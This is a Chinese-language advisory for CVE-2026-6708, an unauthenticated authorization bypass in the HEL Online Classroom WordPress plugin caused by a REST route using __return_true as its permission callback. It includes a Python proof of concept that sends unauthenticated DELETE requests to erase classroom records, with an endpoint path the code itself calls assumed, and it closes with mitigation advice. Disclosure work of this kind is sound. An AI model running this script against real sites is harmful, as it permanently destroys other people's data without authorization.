CVE-2026-6708: HEL Online Classroom插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-6708

漏洞类型

权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

HEL Online Classroom: AI-powered Online Classrooms

漏洞概述

WordPress插件HEL Online Classroom在1.0.3及之前版本中存在权限绕过漏洞。该漏洞源于REST API端点使用了__return_true作为权限回调函数，导致完全绕过WordPress的身份验证和授权检查。未经身份验证的攻击者可利用此漏洞删除任意课堂记录，造成永久性数据丢失。

技术细节

该漏洞源于插件在注册REST API端点时的安全配置错误。开发者在调用register_rest_route函数时，将permission_callback参数硬编码为__return_true。根据WordPress机制，该函数默认返回true，导致系统完全跳过了对当前用户身份的验证以及权限检查。因此，该API端点实际上处于未保护状态。攻击者无需登录账号，只需通过HTTP客户端向该端点发送DELETE请求，并在请求参数中指定目标教室ID，即可利用漏洞删除数据库中的任意记录，造成严重的业务数据破坏。

攻击链分析

STEP 1

侦察

攻击者扫描目标站点，识别是否安装了HEL Online Classroom插件及其版本信息。

STEP 2

利用

攻击者无需登录，直接向受影响的REST API端点发送包含目标ID的HTTP DELETE请求。

STEP 3

影响

服务器接受请求并执行删除操作，导致指定的课堂记录被永久删除。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, classroom_id):
    # Construct the API endpoint URL
    # Assuming the endpoint follows standard WP plugin REST structure based on vulnerability description
    api_endpoint = f"{target_url}/wp-json/hel-online-classroom/v1/classroom/{classroom_id}"
    
    try:
        # Send unauthenticated DELETE request
        response = requests.delete(api_endpoint)
        
        if response.status_code == 200 or response.status_code == 204:
            print(f"[+] Success: Classroom {classroom_id} deleted.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with target URL
    cid = "1" # Replace with target Classroom ID
    exploit(target, cid)

影响范围

HEL Online Classroom: AI-powered Online Classrooms <= 1.0.3

防御指南

临时缓解措施

建议立即将插件升级至修复了该漏洞的最新版本。若暂时无法升级，应禁用插件或通过Web应用防火墙（WAF）拦截对特定API端点的未授权DELETE请求，以防止数据被恶意删除。